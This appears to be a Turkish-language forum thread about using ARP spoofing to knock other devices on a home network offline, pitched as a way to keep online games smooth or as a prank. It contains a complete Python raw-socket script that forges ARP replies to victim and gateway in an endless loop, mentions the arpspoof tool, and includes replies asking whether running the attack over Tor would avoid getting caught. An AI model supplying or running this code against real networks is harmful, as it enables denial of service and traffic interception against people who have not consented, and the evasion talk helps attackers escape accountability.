saldırıyı tarayıcı üzerinden yapmıyoruz.tor üzerinden yaparsak yakalanma şansımız ?
tarayicisiz tor'a baglanabiliyorum ben ondan dedim.saldırıyı tarayıcı üzerinden yapmıyoruz.
ben bunu tarayıcandan yapıyordum modemın arayuzune gırıp kım baglıysa baglantısını kesıyordum net kastıgı zaman yaada yabancı bırısımı baglandı dıye kontrol etme amaclıÖnemli NOT: Teknik olarak bu işlem bir saldırı olup kendinize ait olmayan bir ağ üzerinde yapıp yakalanırsanız 2-4 yıl arası yargılanabilirsiniz. Saldırının dezavantajı, işi bilen kişiye karşı kendi kimliğinizi kabak gibi ortada bırakıyor. Kendi evinizde yapın başkasına bulaşmayın !!!
Malum evden çıkamıyoruz ve bir çoğumuzun internet altyapısı çok iyi değil. Karantina döneminde en keyifli vakit geçirilen oyunlar online oyunlar doğal olarak fakat aynı anda evde birisi film izlemeye veya birşeyler indirmeye çalıştığında oyunumuzun içine edebiliyor.
Konuya gelirsek evlerimizdeki internet dağıtımları routerlar üzerinden gerçekleşmekte. İnternete bağlandığımız cihazlar ARP tablosu adı verilen tablolarda sisteme bağlı diğer cihazları ve en önemlisi router yani gateway in ip adresini de tutmakta. Router belirli zaman aralıklarıyla ağ üzerinde bulunan cihazlara hangi ip adresindeki cihaza internet paketlerini göndererek haberleşmesi gerektiği bilgisini iletir ( yani kendisini ). Biz bu noktada devreye girip saldırmak istediğimiz cihaza artık paketleri bana göndericeksin diye aynı mesaj ile paketleri kendi bilgisayarımıza yönlendirdiğimizde gelen paketlerede yanıt vermeyeceğimiz için karşı tarafın interneti kesilmiş olacak. Bağlantının nasıl olduğu hiç farketmiyor siz kablosuz hedef kablolu bile bağlanabilir. Modem arayüzü vb. yerlere girmekte gerekmiyor.
Ne yaptığı konusunda bir fikri olamayanlar için işin aktif bilgi toplama tarafını anlatmıyorum. Kodla uğraşmadan zahmetsiz yapmak isterseniz Linux için "arpspoof" adında bir toolda mevcut.
Python kodu:
Python:import socket import struct import binascii s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800)) s.bind(("eth0", socket.htons(0x0800))) #Saldırgan mac, kurban mac, router mac (Kendinize göre editleyin) attckmac = '\xff\xff\xff\xff\xff\xff' victimmac = '\xff\xff\xff\xff\xff\xff' gatewaymac = '\xff\xff\xff\xff\xff\xff' code = '\x08\x06' ethernet1 = victimmac + attckmac + code ethernet2 = gatewaymac + attckmac + code htype = '\x00\x01' protype = '\x08\x00' hsize = '\x06' psize = '\x04' opcode = '\x00\x02' #Kurban ip, yeni gateway ip gateway_ip = '192.168.1.x' victim_ip = '192.168.1.x' gatewayip = socket.inet_aton ( gateway_ip ) victimip = socket.inet_aton ( victim_ip ) victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip gateway_ARP = ethernet2 + htype + protype + hsize + psize + opcode + attckmac + victimip + gatewaymac + gatewayip while 1: s.send(victim_ARP) s.send(gateway_ARP)
bu olay modem arayüzüne erişemediğin zamanda çalışıyorben bunu tarayıcandan yapıyordum modemın arayuzune gırıp kım baglıysa baglantısını kesıyordum net kastıgı zaman yaada yabancı bırısımı baglandı dıye kontrol etme amaclı
program sonsuz döngüde çalışıyor. Açık olduğu sürece iş yapar durdurduğun zaman biterpeki ya netten düştükten sonra geri nasıl bağlarız onu
şaka için yaparken her zaman yanlış bir şeyde zarar vermede varIşe yarar şakalar için
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?